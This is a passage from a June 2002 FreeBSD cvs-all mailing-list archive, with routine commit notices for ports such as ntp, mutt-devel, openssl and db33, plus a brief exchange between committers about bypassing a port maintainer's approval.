Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/16 05:52:01 PDT Modified files: net/ntp Makefile Log: Don't use command like the following "tar --exclude ".*" -cf foo.bar ." because `.' itself gets excluded and therefore no files are added into arcive. This should unbreak package on -current with new tar. Reported by: kris Revision Changes Path 1.28 +1 -1 ports/net/ntp/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 5:55:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9930437B406; Sun, 16 Jun 2002 05:55:25 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GCtPk48310; Sun, 16 Jun 2002 05:55:25 -0700 (PDT) (envelope-from glewis) Message-Id: <200206161255.g5GCtPk48310@freefall.freebsd.org> From: Greg Lewis Date: Sun, 16 Jun 2002 05:55:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/games/robocode Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/16 05:55:25 PDT Modified files: games/robocode Makefile Log: Fix dependencies to be in sync with the recent JDK ports renaming. Revision Changes Path 1.6 +2 -2 ports/games/robocode/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 5:59:13 2002 Delivered-To: cvs-all@freebsd.org Received: from sdns.kv.ukrtel.net (sdns.kv.ukrtel.net [195.5.27.246]) by hub.freebsd.org (Postfix) with ESMTP id E073037B412; Sun, 16 Jun 2002 05:59:01 -0700 (PDT) Received: from vega.vega.com (195.5.51.243 [195.5.51.243]) by sdns.kv.ukrtel.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id M7SJ6LD6; Sun, 16 Jun 2002 15:44:14 +0300 Received: from FreeBSD.org (big_brother.vega.com [192.168.1.1]) by vega.vega.com (8.11.6/8.11.3) with ESMTP id g5GCg1b19500; Sun, 16 Jun 2002 15:42:01 +0300 (EEST) (envelope-from sobomax@FreeBSD.org) Message-ID: <3D0C87D4.9EFD22E9@FreeBSD.org> Date: Sun, 16 Jun 2002 15:43:00 +0300 From: Maxim Sobolev Organization: Vega International Capital X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en,uk,ru MIME-Version: 1.0 To: "Tim J. Robbins" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/sed main.c References: <200206160844.g5G8idG95132@freefall.freebsd.org> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG "Tim J. Robbins" wrote: > > tjr 2002/06/16 01:44:39 PDT > > Modified files: > usr.bin/sed main.c > Log: > Correct the handling of (for example) the N command by only zeroing the > input space in mf_fgets() if we reach the end of all input files. Pointy hat to: sobomax -Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 6: 3:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EEAE737B412; Sun, 16 Jun 2002 06:03:18 -0700 (PDT) Received: (from tobez@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GD3ID49165; Sun, 16 Jun 2002 06:03:18 -0700 (PDT) (envelope-from tobez) Message-Id: <200206161303.g5GD3ID49165@freefall.freebsd.org> From: Anton Berezin Date: Sun, 16 Jun 2002 06:03:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/perl5 pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tobez 2002/06/16 06:03:18 PDT Modified files: lang/perl5 pkg-plist Log: During deinstallation, for *.ph files, replace find | xargs rm with find -delete, for obvious reasons. No PORTREVISION bump. Revision Changes Path 1.27 +1 -1 ports/lang/perl5/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 6: 5: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EAA2537B403; Sun, 16 Jun 2002 06:05:01 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GD51v49338; Sun, 16 Jun 2002 06:05:01 -0700 (PDT) (envelope-from glewis) Message-Id: <200206161305.g5GD51v49338@freefall.freebsd.org> From: Greg Lewis Date: Sun, 16 Jun 2002 06:05:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/16 06:05:01 PDT Modified files: . modules Log: Sync up with reality: . Remove perltools. . Add back in nethack32. Reminded by: phantom Revision Changes Path 1.5365 +1 -1 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 6: 5:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6C6B337B414; Sun, 16 Jun 2002 06:05:27 -0700 (PDT) Received: (from demon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GD5Rm51684; Sun, 16 Jun 2002 06:05:27 -0700 (PDT) (envelope-from demon) Message-Id: <200206161305.g5GD5Rm51684@freefall.freebsd.org> From: Dmitry Sivachenko Date: Sun, 16 Jun 2002 06:05:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/mutt-devel Makefile distinfo pkg-plist ports/mail/mutt-devel/files extra-maildir-patch-Makefile.am extra-maildir-patch-globals.h extra-maildir-patch-init.h extra-maildir-patch-mh.c extra-maildir-patch-mutt.h extra-patch-pgp-outlook maildir_clean_dir.c maildir_clean_dir.h ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG demon 2002/06/16 06:05:27 PDT Modified files: mail/mutt-devel Makefile distinfo pkg-plist mail/mutt-devel/files extra-patch-pgp-outlook patch-05 Added files: mail/mutt-devel/files patch-Makefile.am patch-smime-sender smime.h Removed files: mail/mutt-devel/files extra-maildir-patch-Makefile.am extra-maildir-patch-globals.h extra-maildir-patch-init.h extra-maildir-patch-mh.c extra-maildir-patch-mutt.h maildir_clean_dir.c maildir_clean_dir.h Log: Update to version 1.5.1. PR: 38694, 39188 Submitted by: Udo Schweigert (maintainer) Revision Changes Path 1.169 +7 -34 ports/mail/mutt-devel/Makefile 1.73 +5 -5 ports/mail/mutt-devel/distinfo 1.2 +0 -10 ports/mail/mutt-devel/files/extra-maildir-patch-Makefile.am (dead) 1.2 +0 -10 ports/mail/mutt-devel/files/extra-maildir-patch-globals.h (dead) 1.2 +0 -18 ports/mail/mutt-devel/files/extra-maildir-patch-init.h (dead) 1.2 +0 -111 ports/mail/mutt-devel/files/extra-maildir-patch-mh.c (dead) 1.2 +0 -44 ports/mail/mutt-devel/files/extra-maildir-patch-mutt.h (dead) 1.3 +34 -33 ports/mail/mutt-devel/files/extra-patch-pgp-outlook 1.2 +0 -120 ports/mail/mutt-devel/files/maildir_clean_dir.c (dead) 1.2 +0 -42 ports/mail/mutt-devel/files/maildir_clean_dir.h (dead) 1.12 +23 -5 ports/mail/mutt-devel/files/patch-05 1.1 +24 -0 ports/mail/mutt-devel/files/patch-Makefile.am (new) 1.1 +67 -0 ports/mail/mutt-devel/files/patch-smime-sender (new) 1.1 +184 -0 ports/mail/mutt-devel/files/smime.h (new) 1.48 +165 -176 ports/mail/mutt-devel/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 6: 6:46 2002 Delivered-To: cvs-all@freebsd.org Received: from spqr.osg.gov.bc.ca (spqr.osg.gov.bc.ca [142.32.102.24]) by hub.freebsd.org (Postfix) with ESMTP id 99E3537B405; Sun, 16 Jun 2002 06:05:58 -0700 (PDT) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by spqr.osg.gov.bc.ca (Postfix) with ESMTP id 60D459EF18; Sun, 16 Jun 2002 06:05:58 -0700 (PDT) Received: from cwsys.cwsent.com (cwsys2 [10.1.2.1]) by passer.osg.gov.bc.ca (8.12.4/8.12.3) with ESMTP id g5GD5v5W071366; Sun, 16 Jun 2002 06:05:57 -0700 (PDT) (envelope-from cy@cwsent.com) Received: from cwsys (localhost [127.0.0.1]) by cwsys.cwsent.com (8.12.4/8.12.3) with ESMTP id g5GD5vad034926; Sun, 16 Jun 2002 06:05:57 -0700 (PDT) (envelope-from cy@cwsys.cwsent.com) Message-Id: <200206161305.g5GD5vad034926@cwsys.cwsent.com> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 Reply-To: Cy Schubert - CITS Open Systems Group From: Cy Schubert - CITS Open Systems Group X-os: FreeBSD X-Sender: cy@cwsent.com To: Maxim Sobolev Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/net/ntp Makefile In-Reply-To: Message from Maxim Sobolev of "Sun, 16 Jun 2002 05:52:01 PDT." <200206161252.g5GCq1j47904@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 16 Jun 2002 06:05:57 -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message <200206161252.g5GCq1j47904@freefall.freebsd.org>, Maxim Sobolev writ es: > sobomax 2002/06/16 05:52:01 PDT > > Modified files: > net/ntp Makefile > Log: > Don't use command like the following "tar --exclude ".*" -cf foo.bar ." > because `.' itself gets excluded and therefore no files are added into > arcive. This should unbreak package on -current with new tar. > > Reported by: kris > > Revision Changes Path > 1.28 +1 -1 ports/net/ntp/Makefile The port's maintainer, e.g. me, should have been in the loop. Next time send me an email, please. Or am I out of line here? If I am out of line here, then I have a patch that needs to be committed to postgresql7. I suppose I can commit it without discussing it with the maintainer. Right? While you're at it, please make the change to ntp-devel too. Thanks. -- Cheers, Phone: 250-387-8437 Cy Schubert Fax: 250-387-5766 Team Leader, Sun/Alpha Team Email: Cy.Schubert@osg.gov.bc.ca Open Systems Group, CITS Ministry of Management Services Province of BC FreeBSD UNIX: cy@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 6:21: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AD11637B419; Sun, 16 Jun 2002 06:21:06 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GDL6Z58065; Sun, 16 Jun 2002 06:21:06 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206161321.g5GDL6Z58065@freefall.freebsd.org> From: Maxim Sobolev Date: Sun, 16 Jun 2002 06:21:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/ntp-devel Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/16 06:21:06 PDT Modified files: net/ntp-devel Makefile Log: Unbreak package on 5-current by removing useless --exclude ".*" tar(1) option. Revision Changes Path 1.27 +1 -1 ports/net/ntp-devel/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 6:24:12 2002 Delivered-To: cvs-all@freebsd.org Received: from spqr.osg.gov.bc.ca (spqr.osg.gov.bc.ca [142.32.102.24]) by hub.freebsd.org (Postfix) with ESMTP id BE89737B40F; Sun, 16 Jun 2002 06:24:05 -0700 (PDT) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by spqr.osg.gov.bc.ca (Postfix) with ESMTP id 740BD9EF18; Sun, 16 Jun 2002 06:24:05 -0700 (PDT) Received: from cwsys.cwsent.com (cwsys2 [10.1.2.1]) by passer.osg.gov.bc.ca (8.12.4/8.12.3) with ESMTP id g5GDO45W071420; Sun, 16 Jun 2002 06:24:05 -0700 (PDT) (envelope-from cy@cwsent.com) Received: from cwsys (localhost [127.0.0.1]) by cwsys.cwsent.com (8.12.4/8.12.3) with ESMTP id g5GDO4ad044376; Sun, 16 Jun 2002 06:24:04 -0700 (PDT) (envelope-from cy@cwsys.cwsent.com) Message-Id: <200206161324.g5GDO4ad044376@cwsys.cwsent.com> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 Reply-To: Cy Schubert - CITS Open Systems Group From: Cy Schubert - CITS Open Systems Group X-os: FreeBSD X-Sender: cy@cwsent.com To: Maxim Sobolev Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/net/ntp-devel Makefile In-Reply-To: Message from Maxim Sobolev of "Sun, 16 Jun 2002 06:21:06 PDT." <200206161321.g5GDL6Z58065@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 16 Jun 2002 06:24:04 -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message <200206161321.g5GDL6Z58065@freefall.freebsd.org>, Maxim Sobolev writ es: > sobomax 2002/06/16 06:21:06 PDT > > Modified files: > net/ntp-devel Makefile > Log: > Unbreak package on 5-current by removing useless --exclude ".*" tar(1) opti > on. Approved by: cy > > Revision Changes Path > 1.27 +1 -1 ports/net/ntp-devel/Makefile -- Cheers, Phone: 250-387-8437 Cy Schubert Fax: 250-387-5766 Team Leader, Sun/Alpha Team Email: Cy.Schubert@osg.gov.bc.ca Open Systems Group, CITS Ministry of Management Services Province of BC FreeBSD UNIX: cy@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 6:52:40 2002 Delivered-To: cvs-all@freebsd.org Received: from sdns.kv.ukrtel.net (sdns.kv.ukrtel.net [195.5.27.246]) by hub.freebsd.org (Postfix) with ESMTP id 34D2C37B408; Sun, 16 Jun 2002 06:51:44 -0700 (PDT) Received: from vega.vega.com (195.5.51.243 [195.5.51.243]) by sdns.kv.ukrtel.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id M7SJ6L1T; Sun, 16 Jun 2002 16:36:02 +0300 Received: from FreeBSD.org (big_brother.vega.com [192.168.1.1]) by vega.vega.com (8.11.6/8.11.3) with ESMTP id g5GDXqb19689; Sun, 16 Jun 2002 16:33:52 +0300 (EEST) (envelope-from sobomax@FreeBSD.org) Message-ID: <3D0C93FA.DC913FE1@FreeBSD.org> Date: Sun, 16 Jun 2002 16:34:50 +0300 From: Maxim Sobolev Organization: Vega International Capital X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en,uk,ru MIME-Version: 1.0 To: Cy Schubert - CITS Open Systems Group Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/net/ntp Makefile References: <200206161305.g5GD5vad034926@cwsys.cwsent.com> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Cy Schubert - CITS Open Systems Group wrote: > > In message <200206161252.g5GCq1j47904@freefall.freebsd.org>, Maxim > Sobolev writ > es: > > sobomax 2002/06/16 05:52:01 PDT > > > > Modified files: > > net/ntp Makefile > > Log: > > Don't use command like the following "tar --exclude ".*" -cf foo.bar ." > > because `.' itself gets excluded and therefore no files are added into > > arcive. This should unbreak package on -current with new tar. > > > > Reported by: kris > > > > Revision Changes Path > > 1.28 +1 -1 ports/net/ntp/Makefile > > The port's maintainer, e.g. me, should have been in the loop. Next > time send me an email, please. As you wish. The fix was so simple and without any side-effects (there are no .* files in the ${WRKSRC}/html dir other that `.' and `..'), so that I've opted to not waste your and my time by asking for a formal approval. While we on topic I would like to point out that IMO currently MAINTAINER thing is overused - the project needs more co-operation spirit not less, while applying MAINTAINER's lock without taking the common sense into the consideration first works in the exactly opposite direction. :( > Or am I out of line here? If I am out > of line here, then I have a patch that needs to be committed to > postgresql7. I suppose I can commit it without discussing it with the > maintainer. Right? > > While you're at it, please make the change to ntp-devel too. Thanks. Done, thank you for the reminder. -Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 7: 4:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9584237B41E; Sun, 16 Jun 2002 07:04:50 -0700 (PDT) Received: (from dinoex@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GE4oD70032; Sun, 16 Jun 2002 07:04:50 -0700 (PDT) (envelope-from dinoex) Message-Id: <200206161404.g5GE4oD70032@freefall.freebsd.org> From: Dirk Meyer Date: Sun, 16 Jun 2002 07:04:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/openssl Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dinoex 2002/06/16 07:04:50 PDT Modified files: security/openssl Makefile Log: Add an option OPENSSL_OVERWRITE_BASE=yes as we have done in OPENSHH Revision Changes Path 1.60 +5 -0 ports/security/openssl/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 7:24:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A938D37B40C; Sun, 16 Jun 2002 07:24:52 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GEOqo76198; Sun, 16 Jun 2002 07:24:52 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206161424.g5GEOqo76198@freefall.freebsd.org> From: Maxim Sobolev Date: Sun, 16 Jun 2002 07:24:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src Makefile.inc1 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/16 07:24:52 PDT Modified files: . Makefile.inc1 Log: Don't try to build libssh if NO_OPENSSL is defined because NO_OPENSSL implies NO_OPENSSH. Revision Changes Path 1.291 +1 -1 src/Makefile.inc1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 7:31: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5640837B414; Sun, 16 Jun 2002 07:31:05 -0700 (PDT) Received: (from cy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GEV5x76826; Sun, 16 Jun 2002 07:31:05 -0700 (PDT) (envelope-from cy) Message-Id: <200206161431.g5GEV5x76826@freefall.freebsd.org> From: Cy Schubert Date: Sun, 16 Jun 2002 07:31:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/gnu-radius Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG cy 2002/06/16 07:31:05 PDT Modified files: net/gnu-radius Makefile distinfo pkg-plist Log: Upgrade 0.96 --> 0.96.3 PR: 39208 Submitted by: Scott Lambert Approved by: MAINTAINER: Andrey Pavlenko Revision Changes Path 1.6 +1 -3 ports/net/gnu-radius/Makefile 1.2 +1 -1 ports/net/gnu-radius/distinfo 1.2 +5 -1 ports/net/gnu-radius/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 7:47:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A05F837B408; Sun, 16 Jun 2002 07:47:30 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GElUL78514; Sun, 16 Jun 2002 07:47:30 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206161447.g5GElUL78514@freefall.freebsd.org> From: Maxim Sobolev Date: Sun, 16 Jun 2002 07:47:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/gtkhtml Makefile distinfo ports/www/gtkhtml/files patch-af X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/16 07:47:30 PDT Modified files: www/gtkhtml Makefile distinfo www/gtkhtml/files patch-af Log: - Update to 1.0.4; - use REINPLACE_CMD. Revision Changes Path 1.46 +5 -5 ports/www/gtkhtml/Makefile 1.20 +1 -1 ports/www/gtkhtml/distinfo 1.3 +5 -5 ports/www/gtkhtml/files/patch-af To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 7:53:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8445B37B414; Sun, 16 Jun 2002 07:53:25 -0700 (PDT) Received: (from demon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GErPm79339; Sun, 16 Jun 2002 07:53:25 -0700 (PDT) (envelope-from demon) Message-Id: <200206161453.g5GErPm79339@freefall.freebsd.org> From: Dmitry Sivachenko Date: Sun, 16 Jun 2002 07:53:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/mutt-devel/files smime.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG demon 2002/06/16 07:53:25 PDT Modified files: mail/mutt-devel/files smime.h Log: Fix corrupted patch (duplicate of content). Submitted by: MAINTAINER Revision Changes Path 1.2 +0 -92 ports/mail/mutt-devel/files/smime.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 8: 3:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6277A37B41A; Sun, 16 Jun 2002 08:03:11 -0700 (PDT) Received: (from dinoex@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GF3Bu81048; Sun, 16 Jun 2002 08:03:11 -0700 (PDT) (envelope-from dinoex) Message-Id: <200206161503.g5GF3Bu81048@freefall.freebsd.org> From: Dirk Meyer Date: Sun, 16 Jun 2002 08:03:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases/metakit Makefile ports/devel/m6811-gcc Makefile ports/emulators/frodo Makefile ports/emulators/frodo/files patch-TkGui.tcl ports/mail/popa3d Makefile ports/mail/sendmail Makefile ports/mail/sendmail-old ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dinoex 2002/06/16 08:03:10 PDT Modified files: databases/metakit Makefile devel/m6811-gcc Makefile emulators/frodo Makefile emulators/frodo/files patch-TkGui.tcl mail/popa3d Makefile mail/sendmail Makefile mail/sendmail-old Makefile mail/sma Makefile net/freebsd-uucp Makefile net/py-ldap2 Makefile news/cnews Makefile news/ifmail Makefile news/suck Makefile security/openssh Makefile security/openssh-portable Makefile www/webalizer Makefile x11-toolkits/gtoolkit Makefile Log: - Get rid of PERL and use SED Revision Changes Path 1.21 +13 -5 ports/databases/metakit/Makefile 1.16 +3 -1 ports/devel/m6811-gcc/Makefile 1.17 +3 -1 ports/emulators/frodo/Makefile 1.5 +1 -1 ports/emulators/frodo/files/patch-TkGui.tcl 1.13 +6 -2 ports/mail/popa3d/Makefile 1.34 +5 -0 ports/mail/sendmail-old/Makefile 1.47 +5 -3 ports/mail/sendmail/Makefile 1.5 +4 -3 ports/mail/sma/Makefile 1.14 +8 -7 ports/net/freebsd-uucp/Makefile 1.16 +4 -5 ports/net/py-ldap2/Makefile 1.47 +1 -1 ports/news/cnews/Makefile 1.22 +3 -2 ports/news/ifmail/Makefile 1.37 +8 -6 ports/news/suck/Makefile 1.38 +1 -1 ports/security/openssh-portable/Makefile 1.96 +16 -7 ports/security/openssh/Makefile 1.39 +6 -3 ports/www/webalizer/Makefile 1.5 +4 -2 ports/x11-toolkits/gtoolkit/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 8:57:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 830F137B429; Sun, 16 Jun 2002 08:57:14 -0700 (PDT) Received: (from ade@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GFvEw91624; Sun, 16 Jun 2002 08:57:14 -0700 (PDT) (envelope-from ade) Message-Id: <200206161557.g5GFvEw91624@freefall.freebsd.org> From: Ade Lovett Date: Sun, 16 Jun 2002 08:57:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases/db33 Makefile distinfo pkg-comment pkg-descr pkg-plist ports/databases/db33/files patch-dist::Makefile.in patch-dist::configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ade 2002/06/16 08:57:14 PDT Modified files: databases/db33 Makefile distinfo pkg-comment pkg-descr pkg-plist databases/db33/files patch-dist::Makefile.in patch-dist::configure Log: Update to 3.3.11 after repo-copy, since the authors have made a number of gratuitous API changes making a simple upgrade unreasonable. Take maintainership for now. Revision Changes Path 1.42 +5 -4 ports/databases/db33/Makefile 1.16 +3 -3 ports/databases/db33/distinfo 1.2 +77 -72 ports/databases/db33/files/patch-dist::Makefile.in 1.3 +12 -25 ports/databases/db33/files/patch-dist::configure 1.5 +1 -1 ports/databases/db33/pkg-comment 1.8 +1 -1 ports/databases/db33/pkg-descr 1.21 +121 -64 ports/databases/db33/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 8:58:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7C79337B41F; Sun, 16 Jun 2002 08:58:02 -0700 (PDT) Received: (from ade@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id 